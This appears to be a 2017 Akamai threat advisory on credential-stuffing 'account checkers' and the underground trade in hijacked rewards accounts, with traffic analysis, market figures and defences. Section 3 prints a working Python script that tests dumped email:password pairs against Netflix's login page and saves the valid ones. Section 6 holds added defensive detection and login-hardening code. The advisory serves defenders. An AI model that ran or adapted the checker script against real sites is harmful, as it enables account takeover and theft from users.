AKAMAI THREAT ADVISORY

Account Checkers and the Underground Economy for Rewards Fraud

Author: Benjamin Brown, Akamai SIRT

1.0 / Executive Summary

Account checkers are automated scripts or programs used to check a set of credentials against a website’s login system — through its main page, mobile site, or API functions. These account checking campaigns can be overt and behave like a Distributed Denial of Service (DDoS) attack, while in other instances they can be more subtle. They will often come from a wide range of IPs through proxy use, botnet harnessing, or VPN leveraging. Once an account checking campaign is successful, the attackers can gain access to the targeted account — draining it of anything monetizable and then selling access or using the account for nefarious purposes. Defending against account checker attacks can be tricky, but does not need to be a Sisyphean task. In this paper, we’ll explore the potential targets for these attacks, the tools and techniques used, the underground economy that profits from account checking, and strategies for defending your business.

2.0 / Context For Attacks

The success of an account checker, also known as a credential stuffer, relies on the assumption that many people reuse the same login information across multiple websites. This means that a malicious actor only needs to get a victim’s set of credentials from a single site to be able to access that victim’s accounts across multiple other sites and programs. Attackers may then hack, purchase, or find website and database breaches that contain the same username and password sets. These lists of usernames and passwords are then loaded into automated checker scripts or programs that target the login systems for other websites where compromised users may also have active accounts. For example, a seemingly innocuous leak of user login data from a motorcycle repair forum may lead to the breach of multiple PayPal accounts, if participants use the same or similar login information on both websites.

2.1 / Target Industries

Akamai has witnessed account checker activity across most of the industries and verticals we service. Our observations reveal that these attacks are concentrated within the retail, online streaming, gaming, travel, hospitality, and financial sectors. Customer accounts in these industries often have monetizable items, data, credit, points, and/or balances. In the underground markets, these accounts are sold as single or multi-pack sets of login details. The accounts themselves can be used as part of larger identity theft, scamming, or money laundering campaigns. The rewards-specific goods in these accounts can be monetized through resale or transfer. Simultaneously, the personal and financial data attached to the account can be used to build and sell personal identity packets.

2.2 / Traffic Analysis

The account checker attacks Akamai observes tend to be widely distributed and originate from many different geographical locations. Most of the IP addresses involved are compromised routers, home network storage devices, home media boxes, shared and private hosting servers, vulnerable WordPress sites, public proxies, and VPN pools. The traffic itself tends to follow a “low-and-slow” strategy — attempting to blend in with legitimate traffic. Attackers strive to keep request rates beneath the threshold for rate limiters and client reputation scoring.

While these campaigns can, and do, focus on a target’s main website login paths, Akamai also sees a lot of account checker traffic aimed at mobile sites and API login paths. Business logic tends to be simplified, and the layers of defense are less robust along these particular paths. Legacy login paths — some of which the customers didn’t even know still existed — were also targeted. These legacy paths were most likely found through site spidering and DNS brute-forcing.

The observed account checkers aren’t necessarily stopped by the go-to tools of malicious traffic blocking. They often utilized User-Agent (UA) randomization, which trivializes UA fingerprinting. Geo-blocking and IP blacklisting were circumvented through an increase in proxy and IP switching, as well as by leveraging VPN services that market responsive ‘anti-geoblocking’ features, like Hola VPN. Akamai’s observations also found that many attackers react to geoblocks by quickly switching away from the parts of their proxies or compromised hosts that are blacklisted, and instead focusing on those they believed were not yet flagged as ‘malicious’.

One of the oddities Akamai noticed in the account checker traffic was header order. Since the header orders used by checkers tend to be non-standard, they can be used as one in a series of fingerprinting loci. The same traffic was also host to a plethora of invalid or blank referrers (note: there are instances where blank referrers are not a sign of malicious traffic, so you cannot rely on that piece of data alone when profiling client traffic). We also found that, while checkers often used UA randomization, they also sent invalid UA strings (i.e., UA strings that did not belong to any known, legitimate browser).

Figure 1: The attack request rate, as observed by Akamai’s Web Application Firewall

Figure 2: ‘Low-and-slow’ activity from a single IP address — average of 5 requests/minute

3.0 / Tools

The tools used by malicious account checker gangs range in complexity from a short, simple Python script to a feature-rich, continuously developed software suite with customer support options:

import mechanize
import time

print '[+]---Netflix Account Checker v0.1---[+]'
print '--------------By Ramonem----------------'
time.sleep(2)
contex=0
contno=0

accPass=[]
outfile = open('good.txt', 'w')

br = mechanize.Browser()
br.set_handle_equiv(True)
br.set_handle_redirect(True)
br.set_handle_referer(True)
br.set_handle_robots(False)
br.addheaders = [('User-agent', 'Firefox')]
try:
    with open("dump.txt", "r") as filestream:
        for line in filestream:
            br.open('https://www.netflix.com/Login?locale=es-CL')
            currentline = line.split(':')
            br.select_form(nr=0)
            br.form['email'] = currentline[0]
            br.form['password'] = currentline[1]
            print 'Logueando.. mail: '+br.form['email']
            response = br.submit()
            if response.geturl()=='http://www.netflix.com/browse':
                print 'Cuenta activa'
                contex = contex + 1
                br.open('http://www.netflix.com/SignOut?lnkctr=mL')
                accPass.append(currentline[0]+':'+currentline[1])
                time.sleep(2)
            else:
                print 'Muerta..'
                contno = contno + 1
                time.sleep(2)
        print 'Escribiendo cuentas activas al txt..'
        for all in accPass:
            print all
            outfile.write(str(all)+'\n')
except:
    print 'Algo malo ocurrio.. Guardando progreso..'
    for all in accPass:
        outfile.write(str(all)+'\n')
print 'cuentas activas: ' + str(contex)
print 'cuentas muertas: ' + str(contno)

Figure 3: Simple Python 2 script for checking Netflix login credentials (it decides that a credential pair is valid solely from the redirect URL returned after the login POST)

4.0 / Web Based Checkers

One step up from simple scripts are the Web based checkers with Graphical User Interfaces (GUIs). These sites often offer proxy support and quick account checks to grab credit or gift card information, current order statuses, addresses, phone numbers, and email accounts. This information can be used to intercept or reroute purchased goods. The more reliable and sophisticated web checkers often require purchased access tokens to operate; this nets the site admin both direct funding and access to all of the account credentials fed into their site. See examples below of two currently active web-based checkers.

Figure 4: A PHP web-based Walmart account checker with multiple features including proxy support

Figure 5: A PHP web based PayPal account checker with multiple features and a monetization function for the tool’s host

5.0 / Downloadable Checkers

Fraudsters can also download account checking software, which they can run from their local machine. Often found for sale, or cracked, via fraud and hacking forums, many of these downloadable checkers do not have built-in proxy support. These checkers are relatively simple, and tend to focus on a single service, as displayed in the images below.

Figure 6: A simple .NET Windows based Netflix account checker program

One major exception to the typical format of downloadable checkers is Sentry MBA. This account checker program has been in development for a few years, and each new version sports a treasure trove of features for any would-be account hijacker. The latest version of Sentry MBA offers proxy support with a built-in debugger, password brute forcing, custom plugins for popular website login pages, an HTTP debugger, a POST request creation wizard, browser fingerprint spoofing, referrer spoofing, user-agent customization and randomizer, and an OCR equipped captcha solver. See the following examples for greater detail.

Figure 7: A simple Windows based League of Legends account checker program

Figure 8: Sentry MBA 1.5’s ‘Home’ screen

Figure 9: Sentry MBA 1.5’s request header, user-agent, and POST customizers

5.0 / Underground Economy

To understand monetization strategies and get a sense of both the market size and the economic volume for rewards fraud, it is beneficial to turn to the Tor Markets, the successors to Silk Road Online. First, Akamai spot-checked for fraud related listings, such as the following.

Figure 10: Sentry MBA 1.5’s credential ingest screen and optional brute forcing via wordlist tool

Figure 11: Hijacked streaming and retail accounts for sale

Figure 12: Stolen vouchers for sale

Figure 13: Hijacked Virgin Trains account with advertised balance

Figure 14: Offering for fraudulent transfers of GameStop reward points

Figure 15: Offering for fraudulent transfers of air miles

Figure 16: Stolen eGift Card codes for sale

5.1 / Market Selection Criteria

Once the existence of rewards fraud related goods for sale was confirmed, we refined the Tor market selection criteria to ensure that we were gathering data from live and active markets. Next, it was important to be sure the selected markets had an uptime greater than 95%. For our research, Akamai experts also wanted to make sure that they were relatively popular, so we confirmed that the chosen markets garnered Google search impressions of more than 60,000, and Google keywords greater than 100. These prerequisites narrowed research down to three markets: AlphaBay, Nucleus Market, and Dream Market.

5.2 / Market Size

To get a sense of market size, Akamai experts combed through all of the digital and fraud related listings on these three markets. Our research found a total of 14,183 unique digital goods for sale — things like hijacked accounts, eGift cards, malware, and more — along with a total of 15,426 unique fraud related offerings. These unique fraud related offerings were for commodities like bank drops, personally identifiable information or ‘fullz’, and bulk credit card numbers.

5.3 / Breakdown of the Numbers

The data gathered spanned a 10-month period of transactions in 2015. Feedback systems for these markets were locked down to those who had actually purchased the listing, so feedback entries were used to gauge sales volume.

Research found that across the three markets, there were 20 unique listings for logins to 20 different rewards account systems across 7 different vendors, resulting in 2,014 individual sales. There were 54 unique listings for rewards programs related vouchers and e-gift cards, across 13 different vendors resulting in 3,136 individual sales. For transferable rewards points, such as the GameStop PowerUp points shown earlier, there were three separate listings, for three different points systems, by three different vendors, resulting in 698 individual sales.

Surprisingly, only four listings were found, for four different air miles programs, across four vendors, with total individual sales of only 100. After some further investigation, it was found that, within the past few years, many major airlines have overhauled and tightened their miles transfer and authentication policies, combating much of the miles related fraud.

The next category was the most surprising. Research found a slew of offerings from self-proclaimed “Criminal Travel Agents.” These agents would book your next flight, hotel, car rental, train ride, or cruise using hijacked travel rewards accounts. They claimed that since they were using purloined rewards points, and not stolen credit cards, the services would not be canceled or investigated, since no “real” money was lost. Throughout the research process, 93 general listings for these services were found along with 94 custom order listings, across 31 different vendors, resulting in 4,808 separate sales. The market for these services is impressive, and the reviews from buyers were overwhelmingly positive — full of praise for the services rendered.

Category                          Listings                Vendors   Sales
Rewards Account Logins            20                      7         2,014
Vouchers & eGift Cards            54                      13        3,136
Transferable Rewards Points       3                       3         698
Air Miles                         4                       4         100
Criminal Travel Agency Services   93 general, 94 custom   31        4,808

Looking at a 10-month period in 2015 across only 3 Tor Markets, there were 10,756 individual transactions involving rewards account fraud. This certainly constitutes an active market for rewards related account fraud. Aside from the accounts and attached rewards goods, the contents of these accounts were desirable to hijackers in other ways, be it credit card (CC) fraud, accrual of Personally Identifiable Information (PII), or access to other rewards programs through collaborative rewards portals for cross-program fraud.

5.4 / CC Fraud

Many consumers do not think twice when allowing a website to save their credit card information for easy future use or one-click purchasing. In the event that the account gets cracked, the hijacker can then use the attached card to purchase tangible goods, such as gift cards, points, miles, and anything else available through the account — after changing the shipping address of course.

5.5 / PII Concerns

Rewards programs are vehicles for businesses to collect data on customers. This data can then be used for more effective marketing, advertising, and offerings. Rewards accounts often have a large amount of personal information attached to them, such as email addresses, current and past home or work addresses, phone numbers, travel and purchase histories, preferences, reviews, and much more. This information can be readily used by account crackers to perpetrate identity theft, highly targeted scams, and phishing attempts.

5.6 / Cross-Program Fraud

Another rising complication in the fight against rewards fraud is the trend towards networking different rewards programs, enabling cross-program fraud. In this configuration, an account hijacker would only need to crack a login for one of the rewards programs to gain access to the rest in the network, making the account more valuable and tracing the fraud more difficult.

6.0 / Defenses

Changing the thresholds for rate controls was not useful in this case; however, there were a few other defense approaches that made a huge difference. Creating customized Web Application Firewall (WAF) rules, with special attention to quirky header orders and user-agents, as well as checking for valid referrers, proved a large boon to netting and stopping malicious account checker requests.

It was also found that long-routing or tarpitting malicious traffic was more effective than simply serving them a 403. When malicious actors were blocked outright they would simply switch IPs and user-agents. However, when each of their requests was made to take a long time, it greatly slowed down the entire campaign. Another clever defense maneuver that was employed was rerouting account checker traffic coming from known, bad IPs to a static, fake, “You’ve been successfully logged in” page. Since this fake page indicated a successful login, their program marked that set of login credentials as “valid” — whether it was or not — and moved to the next set of credentials in their list. This also helped to poison the attackers’ credential validity tabulation.
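To make the header-order, user-agent, referrer and low-and-slow observations from section 2.2 concrete alongside the tarpit and decoy-page responses just described, here is an added example in Python. It is not Akamai's code and not any WAF's rule syntax: the baseline header order, the User-Agent pattern, the host shop.example, the IP addresses, the score thresholds and the sample requests are all constructed for illustration and would be derived from a property's own legitimate traffic in practice.

```python
"""Heuristic scoring of login POSTs using the traits the advisory reports
(non-standard header order, invalid User-Agent strings, blank or foreign
referrers, a sustained low-and-slow trickle per IP) plus the 6.0 response
policy (tarpit suspicious requests, serve listed IPs a decoy 'logged in' page).
Added example, not Akamai code; hosts, IPs, thresholds and requests are constructed."""
from collections import defaultdict, deque
import re

# Assumed baseline: the relative order a mainstream browser emits these headers in
# on a form POST. Build your own from legitimate traffic to the site you protect.
BASELINE_ORDER = ["host", "user-agent", "accept", "accept-language", "accept-encoding",
                  "content-type", "content-length", "origin", "referer"]
# Loose shape of a real browser UA string; anything else is treated as invalid.
KNOWN_UA = re.compile(r"^Mozilla/5\.0 \(.+\).*(Firefox|Chrome|Safari|Edg)/\d")
LOGIN_HOST = "shop.example"   # constructed
SLOW_WINDOW = 600             # seconds: ~5 req/min sustained over 10 minutes (cf. Figure 2)
SLOW_MIN_HITS = 30


def order_distance(header_names):
    """Count adjacent baseline headers that arrive out of baseline order."""
    ranks = [BASELINE_ORDER.index(h.lower()) for h in header_names
             if h.lower() in BASELINE_ORDER]
    return sum(1 for a, b in zip(ranks, ranks[1:]) if a > b)


def score_request(req, ip_history):
    """Score one login POST. req = {'ip', 'ts', 'headers': [(name, value), ...]}.
    ip_history maps ip -> deque of recent timestamps and is updated here."""
    hdrs = {k.lower(): v for k, v in req["headers"]}
    score, reasons = 0, []
    if order_distance([k for k, _ in req["headers"]]) > 0:
        score += 2
        reasons.append("nonstandard_header_order")
    if not KNOWN_UA.match(hdrs.get("user-agent", "")):
        score += 2
        reasons.append("invalid_ua")
    if LOGIN_HOST not in hdrs.get("referer", ""):
        score += 1            # weak alone: the advisory warns blank referrers are not proof
        reasons.append("blank_or_foreign_referer")
    hist = ip_history[req["ip"]]
    hist.append(req["ts"])
    while hist and req["ts"] - hist[0] > SLOW_WINDOW:
        hist.popleft()
    if len(hist) >= SLOW_MIN_HITS:
        score += 2
        reasons.append("sustained_login_rate")
    return score, reasons


def choose_response(score, ip, known_bad_ips, threshold=4):
    """6.0 policy: decoy success page for listed IPs (poisons the checker's tally),
    tarpit high scores (slows the whole campaign), otherwise let the request through."""
    if ip in known_bad_ips:
        return ("decoy_success", 0)
    if score >= threshold:
        return ("tarpit", 30)     # seconds to hold the connection open (constructed)
    return ("allow", 0)


# --- constructed sample traffic ------------------------------------------------
FIREFOX = "Mozilla/5.0 (Windows NT 10.0; rv:52.0) Gecko/20100101 Firefox/52.0"


def make_req(ip, ts, ua, referer=None, swap_order=False):
    headers = [("Host", LOGIN_HOST), ("User-Agent", ua), ("Accept", "*/*"),
               ("Content-Type", "application/x-www-form-urlencoded")]
    if referer:
        headers.append(("Referer", referer))
    if swap_order:                      # checker quirk: User-Agent emitted before Host
        headers[0], headers[1] = headers[1], headers[0]
    return {"ip": ip, "ts": ts, "headers": headers}


def run_demo():
    """Score four constructed cases; returns {name: (score, reasons, response)}."""
    hist, bad_ips, out = defaultdict(deque), {"203.0.113.9"}, {}
    cases = {
        "legit": make_req("192.0.2.10", 0, FIREFOX, "https://shop.example/login"),
        "checker": make_req("198.51.100.5", 1, "Firefox", swap_order=True),
        "listed": make_req("203.0.113.9", 2, FIREFOX, "https://shop.example/login"),
    }
    for name, req in cases.items():
        s, r = score_request(req, hist)
        out[name] = (s, r, choose_response(s, req["ip"], bad_ips))
    # Low-and-slow: 30 browser-like POSTs 12 s apart, differing only in header order
    for i in range(SLOW_MIN_HITS):
        req = make_req("198.51.100.7", 100 + 12 * i, FIREFOX,
                       "https://shop.example/login", swap_order=True)
        s, r = score_request(req, hist)
    out["slow_30th"] = (s, r, choose_response(s, req["ip"], bad_ips))
    return out


if __name__ == "__main__":
    for name, (s, r, resp) in run_demo().items():
        print(f"{name:10s} score={s} {resp} {r}")
```

Running the file prints one decision per case: the browser-like request is allowed, the request with swapped header order and a bare "Firefox" UA is tarpitted, the listed IP receives the decoy page regardless of its score, and the slow trickle crosses the threshold only when its sustained rate combines with the header-order quirk. That last case is the reason for pairing WAF fingerprinting with rate signals rather than relying on rate controls alone, as the section notes.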

Major defensive gains were also realized when efforts were placed into nuking legacy or publicly-facing development login paths — some of which customers didn’t even know still existed — while also tightening the controls and business logic on the mobile and API login paths.

However, the most successful defense tactic was having besieged customers alter the login process to require more information, such as the account owner’s last name. This method served to break the attacker’s programmed logic for expected login requirements, and was often a piece of data the attackers did not have on hand, especially considering the volume of accounts they were attempting to check. A step further on this defensive path would be for the customer to implement strong two-factor authentication controls.
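As an added example of the last-name requirement and a second factor in code (not Akamai's implementation, and not any customer's actual login flow), the following Python sketch rejects any submission that lacks the extra field, returns one identical failure response for every failure mode, and gates the session on an RFC 6238 TOTP code implemented with the standard library. The e-mail address, password, last name, salt and the RFC 6238 reference secret are constructed test data. The uniform failure response is what defeats checker logic of the "valid if redirected to /browse" kind seen in the Figure 3 script.

```python
"""Login flow hardened along the lines of section 6.0: the form must carry a datum
that credential dumps rarely include (the account holder's last name), every failure
yields one identical response so a checker cannot learn which field was wrong or key
off a redirect URL, and an RFC 6238 TOTP code is required as a second factor.
Added example, not Akamai code; the user record, secret and requests are constructed."""
import base64
import hashlib
import hmac
import struct
import time

PBKDF2_ROUNDS = 200_000
TOTP_STEP = 30
DEMO_SALT = b"fixed-demo-salt-0123"   # constructed; use os.urandom(16) per user in practice
# RFC 6238 reference secret ("12345678901234567890" in base32); constructed test user
RFC_SECRET_B32 = "GEZDGNBVGY3TQOJQGEZDGNBVGY3TQOJQ"


def hash_password(password, salt):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)


def totp(secret_b32, for_time, step=TOTP_STEP, digits=6):
    """RFC 6238 TOTP with HMAC-SHA1, the mode common authenticator apps use."""
    key = base64.b32decode(secret_b32, casefold=True)
    counter = struct.pack(">Q", int(for_time) // step)
    mac = hmac.new(key, counter, hashlib.sha1).digest()
    offset = mac[-1] & 0x0F                               # dynamic truncation
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return "%0*d" % (digits, code % 10 ** digits)


def make_user(password, last_name, secret_b32):
    return {"salt": DEMO_SALT, "pw": hash_password(password, DEMO_SALT),
            "last": last_name.lower(), "totp": secret_b32}


USERS = {"alice@example.net": make_user("correct horse", "Liddell", RFC_SECRET_B32)}

# One response for every failure: missing field, unknown user, bad password, wrong
# last name and wrong OTP are indistinguishable to the client.
UNIFORM_FAIL = {"status": 401, "body": "Login failed", "redirect": None}


def login(form, now=None):
    """form: dict of posted fields. Returns the response the server would send."""
    now = time.time() if now is None else now
    if any(f not in form for f in ("email", "password", "last_name", "otp")):
        return UNIFORM_FAIL                 # breaks a checker built for email+password only
    user = USERS.get(form["email"].lower())
    # Do the PBKDF2 work even for unknown users so timing does not reveal whether
    # the e-mail address exists.
    candidate = hash_password(form["password"], user["salt"] if user else DEMO_SALT)
    expected = user["pw"] if user else bytes(len(candidate))
    ok = hmac.compare_digest(candidate, expected) and user is not None
    ok = ok and hmac.compare_digest(form["last_name"].strip().lower().encode(),
                                    user["last"].encode())
    # Accept the current 30 s step and the previous one to tolerate clock skew.
    ok = ok and any(hmac.compare_digest(form["otp"].encode(),
                                        totp(user["totp"], now - k * TOTP_STEP).encode())
                    for k in (0, 1))
    if not ok:
        return UNIFORM_FAIL
    return {"status": 200, "body": "ok", "redirect": "/account"}


if __name__ == "__main__":
    t = 59  # RFC 6238 test vector time; the 6-digit SHA1 code is 287082
    good = {"email": "alice@example.net", "password": "correct horse",
            "last_name": "Liddell", "otp": totp(RFC_SECRET_B32, t)}
    print(login(good, now=t)["status"])                                   # 200
    print(login({**good, "last_name": "Carroll"}, now=t)["status"])       # 401
    print(login({"email": good["email"], "password": good["password"]},
                now=t)["status"])                                         # 401
```

The design choice worth noting is that the extra field and the OTP are checked only after the password hash has been computed and compared, and that no branch returns anything other than UNIFORM_FAIL on the way out, so neither the response body, the status code, the redirect target nor the timing tells an automated checker which of the four inputs was wrong.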

Akamai gets to deploy a new set of defensive tools due to our recent acquisition of Cyberfend. Cyberfend’s technology works by integrating with a customer website’s login or form submissions. Various aspects of the form submission process are measured and evaluated to determine if activity looks to be bot-driven or automated. Any suspicious activity is flagged for the customer and can be blocked accordingly. This new system also protects against login replay and modified replay attacks.

7.0 / Future of Account Checker Targeting

Akamai predicts that we will continue to see both more leaks of login credentials, and more crackers using them in account checking campaigns. We also expect to see continued expansion of targeted verticals and industries. One particular target of interest will likely be the emerging healthcare and insurance patient portals. As an increasing number of medical records become digitized, more doctors share medical information with patients online, and more healthcare providers support online bill payment, the data and actions accessible through these portals become extremely valuable. This, in turn, escalates their appeal as a target for account checkers.

©2017 Akamai Technologies, Inc. All Rights Reserved. Reproduction in whole or in part in any form or medium without express written permission is prohibited. Akamai and the Akamai wave logo are registered trademarks. Other trademarks contained herein are the property of their respective owners. Akamai believes that the information in this publication is accurate as of its publication date; such information is subject to change without notice. Published 03/17.

Akamai is headquartered in Cambridge, Massachusetts in the United States with operations in more than 57 offices around the world. Our services and renowned customer care are designed to enable businesses to provide an unparalleled Internet experience for their customers worldwide. Addresses, phone numbers and contact information for all locations are listed on www.akamai.com/locations.

About Akamai® As the global leader in Content Delivery Network (cdn) services, Akamai makes the Internet fast, reliable and secure for its customers. The company’s advanced web performance, mobile performance, cloud security and media delivery solutions are revolutionizing how businesses optimize consumer, enterprise and entertainment experiences for any device, anywhere. To learn how Akamai solutions and its team of Internet experts are helping businesses move faster forward, please visit www.akamai.com or blogs.akamai.com, and follow @Akamai on Twitter.